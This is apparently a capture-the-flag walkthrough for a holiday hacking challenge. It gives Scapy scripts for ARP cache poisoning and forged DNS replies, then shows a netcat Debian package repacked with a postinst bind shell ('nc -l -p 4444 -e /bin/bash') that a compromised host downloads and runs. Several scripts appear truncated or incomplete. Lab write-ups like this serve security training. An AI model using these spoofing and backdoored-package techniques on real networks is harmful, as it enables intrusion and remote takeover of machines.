Skip to content

Objective 9 - ARP Shenanigans


Objective 9

The ARP Shenanigans is located on the roof (Netwars room). The terminal challenge for this objective is Scapy Prepper which is offered by Alabaster Snowball.

Objective 9


Solving the terminal challenge Scapy Prepper provides additional hints for this objective. To view the hints or the walk-through for this terminal challenge, use the menu on the left.

To start this objective go to the roof and click on the ARP Shenanigans.

Objective 9

View additional tips by typing cat

Add an additional Terminal Pane by following command:

  /usr/bin/tmux split-window -hb

Now you have a total of four terminals. Resize the terminals so you can view all four.

Tip: To resize terminals use Ctrl+B Up/Down Arrow, and to switch terminals use CTRL+B o.

In one of the terminals start a packet capture by running the following command:

  tcpdump -nni eth0

This will show the ARP requests from the compromised device ( The compromised device is looking for the MAC address of a device with IP

Objective 9

You need to send a spoofed ARP response for IP address to the compromised device. In another word, you need to send a packet to the compromised device, pretending to be, but providing your actual MAC address. This will poison the ARP on the compromised device and will cause it to send packets destined for to your MAC address.

Use nano or VIM to edit the sample arp responder script /scripts/

By examining the sample PCAP file in the /pcaps/ folder you can find the proper values for plen, op, hwlen, ptype, hwtype.

Update the /scripts/ to look like this:

from scapy.all import *
import netifaces as ni
import uuid
# Our eth0 ip
ipaddr = ni.ifaddresses('eth0')[ni.AF_INET][0]['addr']
# Our eth0 mac address
macaddr = ':'.join(['{:02x}'.format((uuid.getnode() >> i) & 0xff) for i in range(0,8*6,8)][::-1])
def handle_arp_packets(packet):
    # if arp request, then we need to fill this out to send back our mac as the response
    if ARP in packet and packet[ARP].op == 1:
        ether_resp = Ether(dst=packet.src, type=0x806, src=macaddr)
        arp_response = ARP(pdst=packet.psrc)
        arp_response.op = 2
        arp_response.plen = 4
        arp_response.hwlen = 6
        arp_response.ptype = 0x800
        arp_response.hwtype = 1

        arp_response.hwsrc = macaddr
        arp_response.psrc = packet.pdst
        arp_response.hwdst = packet.src
        arp_response.pdst = packet.psrc

        response = ether_resp/arp_response

        sendp(response, iface="eth0")

def main():
    # We only want arp requests
    berkeley_packet_filter = "(arp[6:2] = 1)"
    # sniffing for one packet that will be sent to a function, while storing none
    sniff(filter=berkeley_packet_filter, prn=handle_arp_packets, store=0, count=1)

if __name__ == "__main__":

Test run The compromised device should send you a DNS request for after you run .

Objective 9

You need to respond to the DNS request with your IP address. For this use the sample provided in the scripts folder.

Update the sample script as follow:

from scapy.all import *
import netifaces as ni
import uuid
# Our eth0 IP
ipaddr = ni.ifaddresses('eth0')[ni.AF_INET][0]['addr']
# Our Mac Addr
macaddr = ':'.join(['{:02x}'.format((uuid.getnode() >> i) & 0xff) for i in range(0,8*6,8)][::-1])
# destination ip we arp spoofed
ipaddr_we_arp_spoofed = ""
def handle_dns_request(packet):
    # Need to change mac addresses, Ip Addresses, and ports below.
    # We also need
    eth = Ether(src=packet.dst, dst=packet.src)   # need to replace mac addresses
    ip  = IP(dst=packet[IP].src, src=packet[IP].dst)                          # need to replace IP addresses
    udp = UDP(dport=packet[IP].sport, sport=53)                             # need to replace ports
    dns = DNS(
    dns_response = eth / ip / udp / dns
    sendp(dns_response, iface="eth0")
def main():
    berkeley_packet_filter = " and ".join( [
        "udp dst port 53",                              # dns
        "udp[10] & 0x80 = 0",                           # dns request
        "dst host {}".format(ipaddr_we_arp_spoofed),    # destination ip we had spoofed (not our real ip)
        "ether dst host {}".format(macaddr)             # our macaddress since we spoofed the ip to our mac
    ] )
# sniff the eth0 int without storing packets in memory and stopping after one dns request
    sniff(filter=berkeley_packet_filter, prn=handle_dns_request, store=0, iface="eth0", count=1)
if __name__ == "__main__":

Run the updated in one of the terminals. In another terminal, run python3 -m http.server 80. In another terminal, run the updated This will cause the compromised device to connect to our webserver. It will look something like this:

Objective 9

From the http server logs you can see the compromised device is trying to download this specific file:


Objective 9

You need to create a suriv_amd64.deb package so the compromised device runs it.

Tip: How to unpack/repack .deb packages

Run the following commands to extract the netcat package that is provided in the /debs/ folder:

  mkdir tmp
  dpkg-deb -R netcat-traditional_1.10-41.1ubuntu1_amd64.deb  tmp
  cd tmp

Add the following lines to bottom of postinst file with nano or Vim:

  nc -n -v -l -p 4444 -e /bin/bash

Use the following command to build the suriv_amd64.deb package:

  cd ..
  dpkg-deb -b tmp suriv_amd64.deb

Copy the package to the proper folder using the following command:

  cp suriv_amd64.deb ./pub/jfrost/backdoor/

Rerun, python3 -m http.server 80, and in 3 different terminals (in that order).

Wait a few min and then run nc -nv 4444 in one of the terminals to connect to the compromised device.

If everything works you should get a shell back that looks like this:

Objective 9

As the terminal window is small, you need run the following commands to extract the file 15 lines at a time:

sed -n 1,15p NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt
sed -n 15,30p NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt
sed -n 30,45p NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt
sed -n 45,60p NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt
sed -n 60-75p NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt
If you have a bigger display you can simply run cat NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt

You can see the following people attended the meeting:

Objective 9

You can see the following people voted in the meeting:

Objective 9

The person who attended the meeting but did not vote is Tanta Kringle.


  Tanta Kringle